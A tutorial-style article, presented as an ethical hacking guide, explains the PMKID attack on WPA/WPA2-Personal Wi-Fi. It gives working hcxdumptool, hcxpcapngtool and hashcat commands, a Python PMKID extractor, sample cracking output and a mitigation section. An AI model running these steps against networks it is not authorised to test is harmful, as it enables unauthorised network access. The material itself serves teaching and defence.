PMKID Attack

What is a PMKID Attack on Wi-Fi Networks?

This ethical hacking guide explains what a PMKID attack is, how it works, which tools are used and how to prevent such attacks on Wi-Fi networks.

Understanding PMKID

PMKID stands for Pairwise Master Key Identifier. It is a 128-bit value that names a Pairwise Master Key (PMK), the key from which the WPA/WPA2 4-way handshake derives the session keys. In WPA/WPA2-Personal the PMK is simply the Pre-Shared Key (PSK), computed from the Wi-Fi passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations, 256-bit output). The PMKID itself is HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA), so it depends on the PMK and the two MAC addresses and on nothing else. An access point that supports PMK caching (the basis of fast roaming, including 802.11r) advertises the PMKID in the RSN (Robust Security Network) information element carried in the first EAPOL frame of the 4-way handshake, so that a returning client can say which cached PMK it wants to reuse.

What is a PMKID Attack?

A PMKID attack is a method used to recover the passphrase of a Wi-Fi network protected with WPA or WPA2-Personal (PSK). The attacker obtains the PMKID from the RSN (Robust Security Network) information element of the first EAPOL frame the access point sends, then attacks it offline. Because the PMKID is a keyed hash of the PMK, and in WPA2-Personal the PMK is a deterministic function of the passphrase and the SSID, every candidate passphrase can be checked against the captured PMKID without any further contact with the network. The PSK is not "derived" from the PMKID; it is guessed, and the PMKID is what tells the attacker when a guess is right.

How PMKID Attack Works?

The PMKID attack was published in 2018 by Jens ‘Atom’ Steube, the lead developer of the password cracking tool hashcat. Unlike the traditional WPA/WPA2 attack, which captures a complete 4-way handshake between the AP and a real client (usually after deauthenticating that client to force a reconnect), the PMKID attack needs only a single frame from the AP and works with no client connected at all. The cracking step is otherwise the same: both attacks end in an offline guess of the passphrase, and both are defeated by a passphrase that is not guessable.

Here’s a step-by-step breakdown of how the PMKID attack works:

1. Identify the Target Network: The attacker scans for nearby Wi-Fi networks and selects a target that uses WPA/WPA2-Personal (PSK). Enterprise (802.1X) networks are not affected, because their PMK does not come from a passphrase.

2. Request the First Handshake Frame: The attacker's tool (hcxdumptool does this automatically) sends an authentication and association request to the AP as if it were an ordinary client. The AP answers with message 1 of the 4-way handshake, an EAPOL-Key frame it sends before the client has proven anything. Whether that frame contains a PMKID depends on the AP: many APs, typically those with PMK caching or 802.11r roaming support, include one; others never do and cannot be attacked this way.

3. Capture the PMKID: The PMKID sits in the key-data field of that first EAPOL frame, inside the RSN information element as a PMKID KDE (key data encapsulation). The attacker records it together with the AP's MAC address, the station MAC address used for the request and the SSID, all of which enter the PMKID computation. No real client has to be present and nobody needs to be deauthenticated.

4. Crack Offline: The PMKID is HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA), and in WPA/WPA2-Personal the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits). Nothing is computed backwards from the PMKID; instead hashcat takes each candidate passphrase from a wordlist or mask, computes the PMK and then the PMKID, and compares the result with the captured value. A match reveals the passphrase. The PBKDF2 step is what makes each guess expensive (two PBKDF2 blocks of 4096 HMAC-SHA1 rounds each), so the attack is only practical against passphrases that appear in a wordlist or follow a guessable pattern.

Example of a PMKID Attack

Let’s walk through a hypothetical scenario where an attacker uses a PMKID attack to crack a Wi-Fi network’s password.

Step-1: Setup

The attacker sets up their computer with the necessary tools:

  1. A wireless network adapter (and driver) that supports monitor mode and packet injection.
  2. hcxdumptool to put the interface into monitor mode and capture the PMKID (and any 4-way handshakes it sees) into a pcapng file.
  3. hcxpcapngtool (part of the hcxtools package) to convert the capture into hashcat's hash-line format.
  4. hashcat, the password cracking tool that runs the offline dictionary attack.

On a Debian-based Linux system the packaged versions can be installed with the following commands (hcxpcapngtool ships in the hcxtools package, not in a package of its own). hcxdumptool needs exclusive control of the wireless interface, so NetworkManager and wpa_supplicant must be stopped before capturing; the hcxdumptool README for your version gives the exact steps.

Bash
sudo apt-get update
sudo apt-get install hcxdumptool hcxtools hashcat

Step-2: Scan and Capture

hcxdumptool both scans for nearby networks and captures from them. Run it on the monitor-mode interface and write everything it sees to a pcapng file: it associates with each AP in range, requests the first EAPOL frame and records the PMKID whenever the AP includes one. Let it run for a few minutes. APs that never send a PMKID cannot be attacked this way, although any complete 4-way handshake captured into the same file can be cracked with the same hashcat mode. The option names changed in hcxdumptool 6.3 (the output-file option among them), so check hcxdumptool --help for the syntax of your version; the invocation below is for the earlier 6.x releases.

Bash
hcxdumptool -i wlan0 --enable_status=1 -o dumpfile.pcapng

Step-3: Extract the PMKID

hcxpcapngtool reads the capture, pulls out the PMKID (and any complete handshakes) and writes hashcat mode-22000 lines. Mode 22000 and the .hc22000 format superseded the PMKID-only mode 16800 and its .16800 files; current hcxtools no longer produce the old format.

Bash
hcxpcapngtool -o hash.hc22000 dumpfile.pcapng

Step-4: Crack the PMKID

hashcat mode 22000 runs the dictionary attack: for every candidate passphrase it computes the PMK with PBKDF2-HMAC-SHA1 (4096 iterations, SSID as salt), recomputes the PMKID with HMAC-SHA1 over the two MAC addresses and compares it with the captured value. Candidates shorter than 8 or longer than 63 characters are rejected up front, because WPA2 does not accept them as passphrases.

Bash
hashcat -m 22000 hash.hc22000 wordlist.txt

Step-5: Gain Access

If a candidate matches, that candidate is the network's passphrase and the attacker can join the network like any legitimate client. Every step after the capture runs offline, so the target sees nothing unusual in the meantime.
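What hcxpcapngtool does in Step-3, reduced to its essentials, as an added example written for this article (it is not hcxtools code): parse one EAPOL-Key frame, recognise message 1 of the 4-way handshake by its key-info bits, walk the key-data TLVs to the PMKID KDE, and emit the hashcat mode-22000 line. It assumes the 802.11 and LLC/SNAP headers have already been stripped and that the AP and station MAC addresses were taken from the 802.11 header (address 2 and address 1 of a FromDS data frame); the frames, MACs, SSID and PMKID value are constructed for the example.

```python
"""
Added example written for this article (not hcxtools code): the step
hcxpcapngtool performs when it turns a capture into a hash line, reduced
to parsing one EAPOL-Key frame and pulling out the PMKID KDE.

Assumptions: the 802.11 and LLC/SNAP headers have already been stripped
off, and the AP and station MAC addresses were read from the 802.11
header (address 2 and address 1 of a FromDS data frame). The frames and
addresses below are constructed for the example, not a real capture.
"""
import struct
from typing import Optional

EAPOL_TYPE_KEY = 3            # 802.1X packet type for EAPOL-Key
KEY_DESC_RSN = 2              # descriptor type used by WPA2 (RSN)
KEY_INFO_PAIRWISE = 0x0008
KEY_INFO_INSTALL = 0x0040
KEY_INFO_ACK = 0x0080
KEY_INFO_MIC = 0x0100
EAPOL_KEY_FIXED_LEN = 95      # descriptor type .. key data length field
RSN_OUI = b"\x00\x0f\xac"
KDE_TYPE_PMKID = 4            # RSN KDE data type for a PMKID


def extract_pmkid(eapol: bytes) -> Optional[bytes]:
    """Return the 16-byte PMKID carried by EAPOL-Key message 1, or None.

    Message 1 is recognised by its key-info bits: Pairwise and Ack set,
    MIC and Install clear. Only the AP sends such a frame, and only some
    APs put a PMKID KDE in it.
    """
    if len(eapol) < 4:
        return None
    _version, pkt_type, length = struct.unpack("!BBH", eapol[:4])
    if pkt_type != EAPOL_TYPE_KEY:
        return None
    body = eapol[4:4 + length]
    if len(body) < EAPOL_KEY_FIXED_LEN or body[0] != KEY_DESC_RSN:
        return None
    (key_info,) = struct.unpack("!H", body[1:3])
    msg1 = KEY_INFO_PAIRWISE | KEY_INFO_ACK
    if (key_info & msg1) != msg1 or key_info & (KEY_INFO_MIC | KEY_INFO_INSTALL):
        return None
    (data_len,) = struct.unpack("!H", body[93:95])
    key_data = body[95:95 + data_len]
    # Key data is a sequence of TLVs; the PMKID KDE is dd 14 00 0f ac 04 <16 bytes>.
    pos = 0
    while pos + 2 <= len(key_data):
        tag, tlv_len = key_data[pos], key_data[pos + 1]
        value = key_data[pos + 2:pos + 2 + tlv_len]
        if len(value) != tlv_len:      # truncated frame: stop rather than misparse
            return None
        if tag == 0xDD and tlv_len == 20 and value[:3] == RSN_OUI and value[3] == KDE_TYPE_PMKID:
            return value[4:]
        pos += 2 + tlv_len
    return None


def to_hc22000(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, ssid: str) -> str:
    """hashcat mode 22000 line for a PMKID (type 01); the trailing three fields
    are only filled for EAPOL/MIC entries (type 02)."""
    return "WPA*01*%s*%s*%s*%s***" % (pmkid.hex(), mac_ap.hex(), mac_sta.hex(),
                                      ssid.encode().hex())


def pmkid_kde(pmkid: bytes) -> bytes:
    """Encode a PMKID as the RSN KDE an AP places in message 1."""
    return b"\xdd\x14" + RSN_OUI + bytes([KDE_TYPE_PMKID]) + pmkid


def build_eapol_key(key_info: int, key_data: bytes, nonce: bytes = b"\x11" * 32) -> bytes:
    """Build a minimal EAPOL-Key frame (used here only to construct sample input)."""
    body = (bytes([KEY_DESC_RSN]) + struct.pack("!HHQ", key_info, 16, 1) + nonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16)        # IV, RSC, reserved, MIC
            + struct.pack("!H", len(key_data)) + key_data)
    return struct.pack("!BBH", 2, EAPOL_TYPE_KEY, len(body)) + body


# Constructed sample, not a real capture: hypothetical MACs, SSID and PMKID.
SAMPLE_MAC_AP = bytes.fromhex("0013374a5b6c")
SAMPLE_MAC_STA = bytes.fromhex("00deadbeef01")
SAMPLE_SSID = "HomeNet"
SAMPLE_PMKID = bytes(range(16))
MSG1 = build_eapol_key(0x008A, pmkid_kde(SAMPLE_PMKID))   # AP -> STA: Pairwise|Ack, PMKID present
MSG2 = build_eapol_key(0x010A, b"")                       # STA -> AP: Pairwise|MIC, no PMKID

if __name__ == "__main__":
    found = extract_pmkid(MSG1)
    print("message 1:", found.hex() if found else None)
    print("message 2:", extract_pmkid(MSG2))
    if found:
        print(to_hc22000(found, SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_SSID))
```

The key-info test is what separates a usable frame from the rest of the handshake: message 2 (from the station) and message 3 (from the AP) both carry a MIC and are rejected, and a message 1 with an empty key-data field, which is what an AP without a cached PMK sends, yields nothing, matching the note above that not every AP can be attacked this way.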

Example Output

hashcat prints a status block periodically while running and a final one when it stops; when a hash is cracked it also prints the hash line with the recovered passphrase appended after a colon. The output below is illustrative (made up for this article; exact field names and spacing vary a little between hashcat versions), so the numbers are plausible rather than measured:

Bash
hashcat (v6.2.6) starting

OpenCL API (OpenCL 2.1 AMD-APP (3180.7)) - Platform #1 [Advanced Micro Devices, Inc.]
=====================================================================================
* Device #1: Radeon RX 580 Series, 8192/8192 MB (2048 MB allocatable), 36MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts

Session..........: hashcat
Status...........: Running
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: hash.hc22000
Time.Started.....: Wed Jun 19 12:34:21 2024 (1 min, 0 secs)
Time.Estimated...: Wed Jun 19 12:40:26 2024 (5 mins, 5 secs)
Guess.Base.......: File (wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   280.5 kH/s (0.28 MH/s)
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new), 0/1 (0.00%) Salts
Progress.........: 16830000/102345678 (16.44%)
Rejected.........: 4096/16830000 (0.02%)
Restore.Point....: 16826368/102345678 (16.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: abc12345 -> letmein99
Hardware.Mon.#1..: Temp: 55c Fan: 35% Util: 100% Core:1350MHz Mem:2000MHz Bus:16

WPA*01*<pmkid hex>*<ap mac>*<station mac>*<ssid hex>***:password123

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: hash.hc22000
Time.Started.....: Wed Jun 19 12:34:21 2024 (3 mins, 32 secs)
Time.Estimated...: Wed Jun 19 12:37:53 2024 (0 secs)
Guess.Base.......: File (wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   280.5 kH/s (0.28 MH/s)
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new), 1/1 (100.00%) Salts
Progress.........: 59466752/102345678 (58.10%)
Rejected.........: 13312/59466752 (0.02%)
Restore.Point....: 59441152/102345678 (58.08%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: passw0rd1 -> password99
Hardware.Mon.#1..: Temp: 60c Fan: 40% Util: 100% Core:1350MHz Mem:2000MHz Bus:16

Started: Wed Jun 19 12:34:21 2024
Stopped: Wed Jun 19 12:37:53 2024

The recovered passphrase is password123. hashcat stops as soon as the only hash is cracked, which is why the run ends at 58% of the wordlist. The Rejected counter is the number of wordlist entries skipped without hashing because they fell outside the 8 to 63 character range WPA2 permits. The cracked line is also stored in hashcat's potfile, and hashcat -m 22000 hash.hc22000 --show prints it again later without re-running the attack.

Prevention and Mitigation

Given how little interaction the attack needs (one frame from the AP, no connected client), it is worth being precise about what actually stops it. The PMKID only reveals a passphrase because, in WPA/WPA2-Personal, the PMK is a deterministic function of the passphrase and SSID and can be recomputed for every guess; any measure that breaks that property, or makes guessing hopeless, works. Here are several preventive measures:

  • Use a Strong Passphrase: This is the only measure that protects WPA2-Personal itself. Length and randomness matter far more than character classes: a randomly generated passphrase of 16 or more characters (WPA2 allows up to 63) is beyond any wordlist or mask attack, whereas "P@ssw0rd123!" style substitutions are standard hashcat rules. Replace vendor default passphrases, which often follow a per-model pattern that attackers target specifically.
  • Enable WPA3: WPA3-Personal replaces the PSK with SAE (Dragonfly), a password-authenticated key exchange in which the PMK is not derived from the passphrase alone, so a captured PMKID gives an offline attacker nothing to test guesses against. Note that WPA3 transition mode still accepts WPA2 clients using the same passphrase, so the PMKID attack remains possible until WPA2 is fully disabled on the network.
  • Use Enterprise Mode: With WPA2/WPA3-Enterprise (802.1X with a RADIUS server) the PMK comes from the EAP exchange, not from a shared passphrase, so there is no passphrase to guess and nothing a PMKID can be tested against offline.
  • Update Firmware and Disable Unneeded Roaming Features: Keep the router firmware current. Some APs only include a PMKID in the first EAPOL frame when fast roaming or PMK caching (802.11r, PMKSA caching) is enabled; disabling these where the option exists stops those devices handing a PMKID to a station that has never authenticated. A captured 4-way handshake is still crackable the same way, so this is not a substitute for a strong passphrase.
  • Disable WPS: Wi-Fi Protected Setup (WPS) has its own well-known PIN brute-force weakness that hands over the passphrase regardless of its strength. Disabling it removes an unrelated but easier path to the same credential.
  • Segmentation and Isolation: Use network segmentation and client isolation so that a recovered Wi-Fi passphrase gives access to as little as possible, and watch for unknown clients joining the network.

Conclusion

The PMKID attack highlights the importance of strong security measures in securing Wi-Fi networks. By understanding the attack mechanism, its implications and the preventive strategies, network administrators can strengthen their defenses against wireless hacking. The attack does not break the cryptography of WPA/WPA2; it exploits two design properties of WPA/WPA2-Personal, that the PMK is a fixed function of the passphrase and SSID and that an AP will hand a PMKID to a station that has never authenticated. A passphrase that cannot be guessed, or a move to WPA3-Personal or 802.1X where the PMK no longer comes from a passphrase alone, removes the risk.
